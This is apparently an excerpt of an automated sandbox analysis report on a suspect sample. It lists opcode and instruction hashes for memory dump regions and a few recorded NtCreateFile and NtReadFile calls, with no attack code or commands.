                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9fcad0b739c765745c1ce586586323241ae3c372da1121a9b706dd92fb222ce
                                                                    • Instruction ID: b8c15d883f6febe08fe3db1f7c35ee26ae9ba82fb177cdd8d90f6698e54a050a
                                                                    • Opcode Fuzzy Hash: e9fcad0b739c765745c1ce586586323241ae3c372da1121a9b706dd92fb222ce
                                                                    • Instruction Fuzzy Hash: 16D0A73110010193FA2D5F199804B152651EBE4F81F38005EF20F499E0CFB4ECE2E448
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                    • Instruction ID: de52711130f7adc926a855876a3defcfcabfdfc58f3192aadf2f2ee1a8b3ef4e
                                                                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                    • Instruction Fuzzy Hash: 05E08C729406849BDF23DB49C650F4EBFF5FB94B00F24004AA4086F730C634AC00CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                    • Instruction ID: 982ac0ed08631fac325dd2bee900df49a7fa31752d494e02cfc75d92db6d74d1
                                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                    • Instruction Fuzzy Hash: 91D0A9324011A1DBFB02FF14C2187693BB2BB10A08F9820EBC00206A76C33A4A4AC680
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                    • Instruction ID: f2f93851eb223c4c1a324766d729a3badb277ed461723463686296eefeb11aca
                                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                    • Instruction Fuzzy Hash: B4D0E935352990CFD617CB1DC554B5677A5BF44B44FD504A1E901CBB62E63DD984CA00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                    • Instruction ID: b695ea6dd06973c304da8d9b1b40595eaa47166b6b2285ab733248d7e6c02c60
                                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                    • Instruction Fuzzy Hash: 18C08C33080248BBCB126F82CC01F06BF2AFBA8B70F008015FA180B570C632E970EB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                    • Instruction ID: 746313f5c5f3bc888de7284ebfd5abb850a5fce117d863e4825fea64f3ebe31d
                                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                    • Instruction Fuzzy Hash: 51C08C70280A01AAEB221F24CD01B413AA0BB60B01F4800A16301DA4F0DB7CD802E600
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                    • Instruction ID: 8135d47127cbc00a7a25acdf91efa6479b2e050e0cfc3b909a1fe3cc01896bc1
                                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                    • Instruction Fuzzy Hash: 87C08C32080248BBC7126A46CD00F017B29E7A4B60F000021B6040A6718A32E860D588
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                    • Instruction ID: 2259fbf02fa122060706644bc27f121d4f688cd3d37d6d3971f3e45d9e61b778
                                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                    • Instruction Fuzzy Hash: ECC04C32180648BBC7126E46DD01F557B69E7A4B60F154025B6080A9718576ED61E598
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                    • Instruction ID: 837673f1f67edd58ad8a953a7020436b584a941d52ef42e2a118ed9b76271146
                                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                    • Instruction Fuzzy Hash: DEC02B70150840FBF7251F30CD01F197254F750E21F6803587224459F0D53C9C00E100
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                    • Instruction ID: d962809df9884ecc50f0aeef7d1539ec938e6f364fe2967c9cbc243e03b7902b
                                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                    • Instruction Fuzzy Hash: E9C08CB01411845AEB3B570ECE20B223A50AB2861AF88019DEA4A096B2C3B8B842C208
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                    • Instruction ID: 76f55810b26c390c6d79ed0c1fc7ec3969ff060da166b9e1781dc25147ed94b0
                                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                    • Instruction Fuzzy Hash: FEB092353019408FCE16DF18C084B1633E4BB88A40B8400D0E400CBA21D329E8008900
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                    • Instruction ID: cae717259bd33d075c5796521621d21c77a47b196a4232c8d5a89cec57beee90
                                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                    • Instruction Fuzzy Hash: 53B092328104518BCF02EB40C610A197731AB10650F0544959001279308228AC01CA40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 63ba886c4cd2795a962d8c0e2173bae647fa09795693ea57406f5a6d1e4b0556
                                                                    • Instruction ID: b90068bca41ca1e56daf45027b963e4f9485065a15c74b6a66330a1104bb4991
                                                                    • Opcode Fuzzy Hash: 63ba886c4cd2795a962d8c0e2173bae647fa09795693ea57406f5a6d1e4b0556
                                                                    • Instruction Fuzzy Hash: DC9002A170140803D140659A48046070009A7D0346F51C012A2454556ECF798C517176
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b406a3123c75e93a64d0a48368f59447429b4fe78257dc18afd20c0cf9870e11
                                                                    • Instruction ID: adfc94968115ab560aaa30fb7b8c50c0d0ccfcd56cfbc353611fbd1e5d9f3585
                                                                    • Opcode Fuzzy Hash: b406a3123c75e93a64d0a48368f59447429b4fe78257dc18afd20c0cf9870e11
                                                                    • Instruction Fuzzy Hash: 1F900265721004020145A59A060450B0449B7D6395391C016F1806591CCB7188656362
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f444f8fef344eff57866b4b3ef19da01efc6d73c35098a6f368581df687f384c
                                                                    • Instruction ID: 9fb287674536b0f289af4c1aa0a7a8f6e7079aaf55101d75a24d5590ff587642
                                                                    • Opcode Fuzzy Hash: f444f8fef344eff57866b4b3ef19da01efc6d73c35098a6f368581df687f384c
                                                                    • Instruction Fuzzy Hash: B19002E1701144924500A29A8404B0A4509A7E0245B51C017E1444561CCA758851A176
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d19f170e353500d906d7d4080d9d47b8f30e4c1103c261e58e931adf8340d20f
                                                                    • Instruction ID: 9d9c833940b94b2212a8e27a03c7f38bb0e7d7e19547d4cad49db6dbc9e147f9
                                                                    • Opcode Fuzzy Hash: d19f170e353500d906d7d4080d9d47b8f30e4c1103c261e58e931adf8340d20f
                                                                    • Instruction Fuzzy Hash: 25900271F05004129140719A4814646400AB7E0785B55C012A0904555CCEA48A5563E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed0034513547bf5a8e7d34c67440a09b8320776b05b235d316698612b64c43aa
                                                                    • Instruction ID: 82cb6837df3422adfb0a2334b8c95c0f93b24e47e3c26107a60637eb194334b0
                                                                    • Opcode Fuzzy Hash: ed0034513547bf5a8e7d34c67440a09b8320776b05b235d316698612b64c43aa
                                                                    • Instruction Fuzzy Hash: 2E9002A171100442D104619A44047060049A7E1245F51C013A2544555CCA798C616166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a2a837f406b0830daa3077a9ecd79b2539bd790f63fcaf9eef9c7ec316847cb3
                                                                    • Instruction ID: d53752a6201f598bb7e05a93ccf67cb0a6e6a31e8e7e70a5375580ffcf4258bb
                                                                    • Opcode Fuzzy Hash: a2a837f406b0830daa3077a9ecd79b2539bd790f63fcaf9eef9c7ec316847cb3
                                                                    • Instruction Fuzzy Hash: 3A90027170100C02D104619A48046860009A7D0345F51C012A6414656EDBB588917172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b6fd5e0ee4c24988033573fad5a579a4d789a43702acfa053a312643fe7a54d
                                                                    • Instruction ID: a87054a8d3d471d799c4e88211b44c36cd49b875f477d53c729f95e22023671e
                                                                    • Opcode Fuzzy Hash: 2b6fd5e0ee4c24988033573fad5a579a4d789a43702acfa053a312643fe7a54d
                                                                    • Instruction Fuzzy Hash: B39002A1B01144434540B19A48044065019B7E1345391C122A0844561CCBB88855A2A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 346e1f0a0c85ea715bb796bfcb037ea293e42c8aa07fb01ea79d1e4ea652f2b6
                                                                    • Instruction ID: 265d00c9952fe1ea644eef7ea5a86188d4873fa8c47e015d29affa2166ea88f3
                                                                    • Opcode Fuzzy Hash: 346e1f0a0c85ea715bb796bfcb037ea293e42c8aa07fb01ea79d1e4ea652f2b6
                                                                    • Instruction Fuzzy Hash: ED90027174100802D141719A4404606000DB7D0285F91C013A0814555ECBA58A56BAA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b3749be59288cabcd0500610a0c6cd8b562bb6623dfe123ea44d7a17c2c52b0
                                                                    • Instruction ID: c1492fdbf45fb9b49d852417cf711d56093803d9223a1b1da63a1b2d85578c1d
                                                                    • Opcode Fuzzy Hash: 3b3749be59288cabcd0500610a0c6cd8b562bb6623dfe123ea44d7a17c2c52b0
                                                                    • Instruction Fuzzy Hash: B490026170100802D102619A4414606000DE7D1389F91C013E1814556DCB758953B173
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 829f6a76dcaf9f8204071ed6e6deb29531bb3547afad05bb09c777d65ad76519
                                                                    • Instruction ID: 20c3d49ba2c5899caadeeea60ee339f9df22c0a0ceb5b44538dc72e7810743a8
                                                                    • Opcode Fuzzy Hash: 829f6a76dcaf9f8204071ed6e6deb29531bb3547afad05bb09c777d65ad76519
                                                                    • Instruction Fuzzy Hash: C290027170100803D100619A55087070009A7D0245F51D412A0814559DDBA688517162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e4fd5dac880d715dc26783600f212d64310b50a90c4c276ae72bc672811b8ab
                                                                    • Instruction ID: 2b516dab7200c74e528173f25363c04bd335d6023659fafa3830d272360b0039
                                                                    • Opcode Fuzzy Hash: 0e4fd5dac880d715dc26783600f212d64310b50a90c4c276ae72bc672811b8ab
                                                                    • Instruction Fuzzy Hash: 3B90026170504842D100659A5408A060009A7D0249F51D012A1454596DCB758851B172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91dd5444791c83aab92143f97b932b2e1d4bf256ae0e54a789460863ef5a4991
                                                                    • Instruction ID: b254d3b4e17bbfe4dcfcb0096af93b887622a275c6021b862a477aeeb67bbfc3
                                                                    • Opcode Fuzzy Hash: 91dd5444791c83aab92143f97b932b2e1d4bf256ae0e54a789460863ef5a4991
                                                                    • Instruction Fuzzy Hash: 1990027570504842D500659A5804A870009A7D0349F51D412A081459DDCBA48861B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b76bcc2b40b1a294fee28033b0916316757333874e32b5511a7979978e2ab5bc
                                                                    • Instruction ID: 255b47431eda3439c680627fdc5bb90977d8fba05e128dc5fd107f8d33c4aa15
                                                                    • Opcode Fuzzy Hash: b76bcc2b40b1a294fee28033b0916316757333874e32b5511a7979978e2ab5bc
                                                                    • Instruction Fuzzy Hash: 2890026174100C02D140719A8414707000AE7D0645F51C012A0414555DCB66896576F2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47b2d6c28baae96075764c449e2b5b7e0f2f2fe631b9be54c03941d375d70ff7
                                                                    • Instruction ID: 6fba2c5521e9cddf00836e34d825901e094783e35d84bfa05e1fc878b0c77148
                                                                    • Opcode Fuzzy Hash: 47b2d6c28baae96075764c449e2b5b7e0f2f2fe631b9be54c03941d375d70ff7
                                                                    • Instruction Fuzzy Hash: 81900271701004529500A6DA5804A4A4109A7F0345B51D016A4404555CCAA488616162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73312cc87b0854b86d6fc4c58ca32694a31b8f1477c8b0f40f566e322e3fedde
                                                                    • Instruction ID: d9f3b575456c4d485ef38eb2effb6a9e9bd7a56b47ab9f4a7b0232cd2a116b58
                                                                    • Opcode Fuzzy Hash: 73312cc87b0854b86d6fc4c58ca32694a31b8f1477c8b0f40f566e322e3fedde
                                                                    • Instruction Fuzzy Hash: 2D900261B0500802D140719A54187060019A7D0245F51D012A0414555DCBA98A5576E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80fa424175ae429e871a5131bd3b461eee6a28bb3bce4e41a5813a355ed761d2
                                                                    • Instruction ID: 5d14b78b9251cabaff119d3c54ae4679afcf18cf33fb09a0b85a0e2bc0bb987a
                                                                    • Opcode Fuzzy Hash: 80fa424175ae429e871a5131bd3b461eee6a28bb3bce4e41a5813a355ed761d2
                                                                    • Instruction Fuzzy Hash: 7B90027170144402D140719A844460B5009B7E0345F51C412E0815555CCB658856A262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c1fadcc0e36d8f7c00ab522d1f912efbd179f68cd3c0caf48c5a3f09ab21356
                                                                    • Instruction ID: ef792edf7c024c0fb351f0bb8ad8f6d5ec513934f34e5a312f96de88db5cebe0
                                                                    • Opcode Fuzzy Hash: 2c1fadcc0e36d8f7c00ab522d1f912efbd179f68cd3c0caf48c5a3f09ab21356
                                                                    • Instruction Fuzzy Hash: 7C90027170504C42D140719A4404A460019A7D0349F51C012A0454695DDB758D55B6A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d2a2415c1440b01d2027dd59dc93c4156aea07950f108eab7f6fdfd72211a167
                                                                    • Instruction ID: 3dd186cdac4a245dd74bde7b57ef713a4207e6e1c40bc3a716dec581a92e9959
                                                                    • Opcode Fuzzy Hash: d2a2415c1440b01d2027dd59dc93c4156aea07950f108eab7f6fdfd72211a167
                                                                    • Instruction Fuzzy Hash: 21900271B0500C02D150719A44147460009A7D0345F51C012A0414655DCBA58A5576E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac9389228791720dcfa3199e723f4797c30ba7ccdf058367816895e3e8ff2838
                                                                    • Instruction ID: 7f0b466027a543e0a5047672a1827a5077bd02a69c4f4a0c694a4bdaed287b10
                                                                    • Opcode Fuzzy Hash: ac9389228791720dcfa3199e723f4797c30ba7ccdf058367816895e3e8ff2838
                                                                    • Instruction Fuzzy Hash: 4E90027170140802D100619A48087470009A7D0346F51C012A5554556ECBB5C8917572
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b419149d1a325230396affc9913c516fd5c8d787c8ce766fbbee731b19d3352d
                                                                    • Instruction ID: b7abda3ea0a766ec52be8c175abc3487826bf2518b44c5421af43b887eaa9976
                                                                    • Opcode Fuzzy Hash: b419149d1a325230396affc9913c516fd5c8d787c8ce766fbbee731b19d3352d
                                                                    • Instruction Fuzzy Hash: A290027170100C42D100619A4404B460009A7E0345F51C017A0514655DCB65C8517562
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e0497066a9827c1f19f545c7d928678c0ab6a746a42e45288f1d5ab321de650
                                                                    • Instruction ID: aa14ad11b6ec66b621d68ed0ad91c0e68cad35625088db257d70100f0e1fe537
                                                                    • Opcode Fuzzy Hash: 9e0497066a9827c1f19f545c7d928678c0ab6a746a42e45288f1d5ab321de650
                                                                    • Instruction Fuzzy Hash: 7E90026170144842D140629A4804B0F4109A7E1246F91C01AA4546555CCE6588556762
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: 65e4faa3bc8224ad97750209c411ec2ec1cec6a8ebcf6bb0630f7dcc033264e1
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014AFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014AFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014AFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 54fb2c6185bb461cab13f5ee0d80808f6545c2e1e5a91048c78d470190d13d76
                                                                    • Instruction ID: 4574305bbc6edeeefb2068555c352acf46f933de7ab2b7fa1ab3730e71d60f3e
                                                                    • Opcode Fuzzy Hash: 54fb2c6185bb461cab13f5ee0d80808f6545c2e1e5a91048c78d470190d13d76
                                                                    • Instruction Fuzzy Hash: C2F0C8361006017BD7211A46DC05F27BF5ADB64730F25021AF628595F1E972A82096A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,027B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 027B820D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: a9f93b9354c828af976ae2f7e142a28ddd1892eb8198c0dda5be3d745ab2a8a4
                                                                    • Instruction ID: 545063c81e4cb6c173625dfe7ee1f3b3880a90b32e3e206d93858c1ee87997d9
                                                                    • Opcode Fuzzy Hash: a9f93b9354c828af976ae2f7e142a28ddd1892eb8198c0dda5be3d745ab2a8a4
                                                                    • Instruction Fuzzy Hash: D901B6B2204108AFCB08CF98DC94EEB37A9AF8C354F158648FA0DD7251D630E811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,027B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 027B820D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 56eaa716f780e3cd4a9d4e2c6d370b6f42836389a639f8b6894232e5b4fe938e
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: BBF0B2B2200208ABCB08CF89DC84EEB77ADAF8C754F158648FA0D97240C630E8118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(027B3D52,5E972F59,FFFFFFFF,027B3A11,?,?,027B3D52,?,027B3A11,FFFFFFFF,5E972F59,027B3D52,?,00000000), ref: 027B82B5
